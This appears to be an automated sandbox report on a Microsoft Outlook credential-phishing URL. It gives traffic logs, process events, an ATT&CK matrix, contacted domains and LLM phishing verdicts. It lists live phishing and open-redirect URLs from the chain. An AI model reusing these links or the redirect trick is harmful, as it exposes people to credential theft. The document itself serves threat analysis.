            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:49:07 GMTServer: ApacheContent-Length: 315Keep-Alive: timeout=5, max=99Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
            Source: unknownNetwork traffic detected: HTTP traffic on port 60116 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60139 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60136
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60135
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60134
            Source: unknownNetwork traffic detected: HTTP traffic on port 60131 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60133
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60132
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60131
            Source: unknownNetwork traffic detected: HTTP traffic on port 60125 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60139
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60138
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 60119 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 60142 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60136 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60142
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60141
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60140
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
            Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
            Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
            Source: unknownNetwork traffic detected: HTTP traffic on port 60140 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
            Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
            Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60134 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
            Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60141 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60135 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60129 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
            Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
            Source: unknownNetwork traffic detected: HTTP traffic on port 60115 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60132 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60126 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
            Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
            Source: unknownNetwork traffic detected: HTTP traffic on port 60118 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
            Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60133 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60127 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60119
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60118
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60116
            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60115
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
            Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
            Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
            Source: unknownNetwork traffic detected: HTTP traffic on port 60138 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60125
            Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60124
            Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
            Source: unknownNetwork traffic detected: HTTP traffic on port 60124 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60129
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60127
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60126
            Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49726 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49728 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.16:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.16:60115 version: TLS 1.2
            Source: classification engineClassification label: mal68.phis.win@25/39@38/201
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
            Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://m.exactag.com/ai.aspx?tc=d9550673bc40b07205bbd26a23a8d2e6b6b4f9&url=%68%74%74%70%25%33%41tuskerdigital.com%2Fwinner%2F24968%2F%2FdHJ1bXBzdWNrc2RpY2tAbWFpbC5ydQ==
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 --field-trial-handle=1944,i,2964829141203310192,9280218611734516593,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 --field-trial-handle=1944,i,2964829141203310192,9280218611734516593,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure1
            Drive-by Compromise            		Windows Management Instrumentation1
            Registry Run Keys / Startup Folder            		1
            Process Injection            		1
            Masquerading            		OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Registry Run Keys / Startup Folder            		1
            Process Injection            		LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
            Non-Application Layer Protocol            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
            Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
            Ingress Tool Transfer            		Traffic DuplicationData Destruction

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            https://m.exactag.com/ai.aspx?tc=d9550673bc40b07205bbd26a23a8d2e6b6b4f9&url=%68%74%74%70%25%33%41tuskerdigital.com%2Fwinner%2F24968%2F%2FdHJ1bXBzdWNrc2RpY2tAbWFpbC5ydQ==0%Avira URL Cloudsafe

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://tuskerdigital.com/favicon.ico0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            74a4acd7.5eca4a6b0b2ee89fe739b742.workers.dev
            		104.21.57.170
            		truefalse
              		unknown
              sni1gl.wpc.alphacdn.net
              		152.199.21.175
              		truefalse
                		unknown
                juliodown.com
                		212.18.104.118
                		truefalse
                  		unknown
                  tuskerdigital.com
                  		103.83.194.55
                  		truefalse
                    		unknown
                    tp-emea.exactag.com
                    		85.14.248.91
                    		truefalse
                      		unknown
                      happylifedon.com
                      		212.18.104.118
                      		truetrue
                        		unknown
                        s-part-0014.t-0009.t-msedge.net
                        		13.107.246.42
                        		truefalse
                          		unknown
                          challenges.cloudflare.com
                          		104.17.2.184
                          		truefalse
                            		unknown
                            sni1gl.wpc.omegacdn.net
                            		152.199.21.175
                            		truefalse
                              		unknown
                              www.google.com
                              		142.250.186.100
                              		truefalse
                                		unknown
                                doitace.com
                                		212.18.104.118
                                		truefalse
                                  		unknown
                                  FRA-efz.ms-acdc.office.com
                                  		52.98.253.98
                                  		truefalse
                                    		unknown
                                    s-part-0042.t-0009.t-msedge.net
                                    		13.107.246.70
                                    		truefalse
                                      		unknown
                                      s-part-0032.t-0009.t-msedge.net
                                      		13.107.246.60
                                      		truefalse
                                        		unknown
                                        r4.res.office365.com
                                        		unknown
                                        		unknownfalse
                                          		unknown
                                          aadcdn.msftauth.net
                                          		unknown
                                          		unknownfalse
                                            		unknown
                                            logincdn.msftauth.net
                                            		unknown
                                            		unknownfalse
                                              		unknown
                                              m.exactag.com
                                              		unknown
                                              		unknownfalse
                                                		unknown
                                                outlook.office365.com
                                                		unknown
                                                		unknownfalse
                                                  		unknown
                                                  acctcdn.msftauth.net
                                                  		unknown
                                                  		unknownfalse
                                                    		unknown

                                                    Contacted URLs

                                                    NameMaliciousAntivirus DetectionReputation
                                                    https://74a4acd7.5eca4a6b0b2ee89fe739b742.workers.dev/?email=trumpsucksdick@mail.rufalse
                                                      		unknown
                                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/cccwb/0x4AAAAAAAdVmX4Y8IG49PoL/auto/normalfalse
                                                        		unknown
                                                        http://tuskerdigital.com/winner/24968//dHJ1bXBzdWNrc2RpY2tAbWFpbC5ydQ==false
                                                          		unknown
                                                          http://tuskerdigital.com/favicon.icofalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://outlook.office365.com/owa/prefetch.aspxfalse
                                                            		unknown

                                                            World Map of Contacted IPs

                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs

                                                            Public IPs

                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            142.250.185.99
                                                            		unknownUnited States
                                                            		15169GOOGLEUSfalse
                                                            142.250.186.46
                                                            		unknownUnited States
                                                            		15169GOOGLEUSfalse
                                                            142.250.186.170
                                                            		unknownUnited States
                                                            		15169GOOGLEUSfalse
                                                            40.126.32.140
                                                            		unknownUnited States
                                                            		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                            20.189.173.3
                                                            		unknownUnited States
                                                            		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                            212.18.104.118
                                                            		juliodown.comunknown
                                                            		8687PPP-ASDEtrue
                                                            13.107.246.60
                                                            		s-part-0032.t-0009.t-msedge.netUnited States
                                                            		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                            52.98.253.98
                                                            		FRA-efz.ms-acdc.office.comUnited States
                                                            		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                            20.189.173.12
                                                            		unknownUnited States
                                                            		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                            104.17.3.184
                                                            		unknownUnited States
                                                            		13335CLOUDFLARENETUSfalse
                                                            142.250.184.206
                                                            		unknownUnited States
                                                            		15169GOOGLEUSfalse
                                                            172.217.18.10
                                                            		unknownUnited States
                                                            		15169GOOGLEUSfalse
                                                            23.38.98.96
                                                            		unknownUnited States
                                                            		16625AKAMAI-ASUSfalse
                                                            142.250.110.84
                                                            		unknownUnited States
                                                            		15169GOOGLEUSfalse
                                                            34.104.35.123
                                                            		unknownUnited States
                                                            		15169GOOGLEUSfalse
                                                            1.1.1.1
                                                            		unknownAustralia
                                                            		13335CLOUDFLARENETUSfalse
                                                            172.217.18.3
                                                            		unknownUnited States
                                                            		15169GOOGLEUSfalse
                                                            103.83.194.55
                                                            		tuskerdigital.comUnited States
                                                            		132335NETWORK-LEAPSWITCH-INLeapSwitchNetworksPvtLtdINfalse
                                                            13.107.246.70
                                                            		s-part-0042.t-0009.t-msedge.netUnited States
                                                            		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                            85.14.248.91
                                                            		tp-emea.exactag.comGermany
                                                            		24961MYLOC-ASIPBackboneofmyLocmanagedITAGDEfalse
                                                            20.189.173.25
                                                            		unknownUnited States
                                                            		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                            239.255.255.250
                                                            		unknownReserved
                                                            		unknownunknownfalse
                                                            152.199.21.175
                                                            		sni1gl.wpc.alphacdn.netUnited States
                                                            		15133EDGECASTUSfalse
                                                            104.21.57.170
                                                            		74a4acd7.5eca4a6b0b2ee89fe739b742.workers.devUnited States
                                                            		13335CLOUDFLARENETUSfalse
                                                            142.250.186.100
                                                            		www.google.comUnited States
                                                            		15169GOOGLEUSfalse
                                                            104.17.2.184
                                                            		challenges.cloudflare.comUnited States
                                                            		13335CLOUDFLARENETUSfalse
                                                            40.126.32.136
                                                            		unknownUnited States
                                                            		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse

                                                            Private

                                                            IP
                                                            192.168.2.16

                                                            General Information

                                                            Joe Sandbox version:40.0.0 Tourmaline
                                                            Analysis ID:1467116
                                                            Start date and time:2024-07-03 17:48:37 +02:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                            Sample URL:https://m.exactag.com/ai.aspx?tc=d9550673bc40b07205bbd26a23a8d2e6b6b4f9&url=%68%74%74%70%25%33%41tuskerdigital.com%2Fwinner%2F24968%2F%2FdHJ1bXBzdWNrc2RpY2tAbWFpbC5ydQ==
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:14
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • EGA enabled
                                                            Analysis Mode:stream
                                                            Analysis stop reason:Timeout
                                                            Detection:MAL
                                                            Classification:mal68.phis.win@25/39@38/201

                                                            Warnings

                                                            • Exclude process from analysis (whitelisted): svchost.exe
                                                            • Excluded IPs from analysis (whitelisted): 142.250.185.99, 142.250.186.46, 142.250.110.84, 34.104.35.123
                                                            • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, clientservices.googleapis.com, clients.l.google.com
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • VT rate limit hit for: https://m.exactag.com/ai.aspx?tc=d9550673bc40b07205bbd26a23a8d2e6b6b4f9&url=%68%74%74%70%25%33%41tuskerdigital.com%2Fwinner%2F24968%2F%2FdHJ1bXBzdWNrc2RpY2tAbWFpbC5ydQ==

                                                            LLM Input / Output

                                                            InputOutput
                                                            URL: https://happylifedon.com/?ygcge1zhh=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc29 Model: Perplexity: mixtral-8x7b-instruct
                                                            {"loginform": true,"urgency": false,"captcha": false,"reasons": ["The webpage contains a login form as it explicitly requests sensitive information such as email addresses and passwords with the text 'Sign in to continue to Outlook' and 'No account? Create one!'","The text does not create a sense of urgency as it does not use phrases such as 'Click here to view document' or 'To view secured document click here'","There is no CAPTCHA or anti-robot detection mechanism present on the webpage","The analysis is based on the provided title and text of the webpage"]}
                                                            Title: siiw0ioenr OCR: Outlook Microsoft Sign in to continue to Outlook trumpsucksdick@mail.ru No account? Create one! Can't access your account? Next Sign-in options Terms of use Privacy &
                                                            URL: https://happylifedon.com Model: gpt-4o
                                                            ```json{  "phishing_score": 9,  "brands": "Microsoft",  "phishing": true,  "suspicious_domain": true,  "has_prominent_loginform": true,  "has_captcha": false,  "setechniques": true,  "has_suspicious_link": false,  "legitmate_domain": "outlook.com",  "reasons": "The URL 'https://happylifedon.com' does not match the legitimate domain name 'outlook.com' associated with Microsoft Outlook. The page prominently displays a login form, which is a common tactic used in phishing attacks. The domain name 'happylifedon.com' is highly suspicious and unrelated to Microsoft or Outlook. Additionally, the use of social engineering techniques is evident as the page mimics the legitimate Outlook login page to deceive users into entering their credentials."}
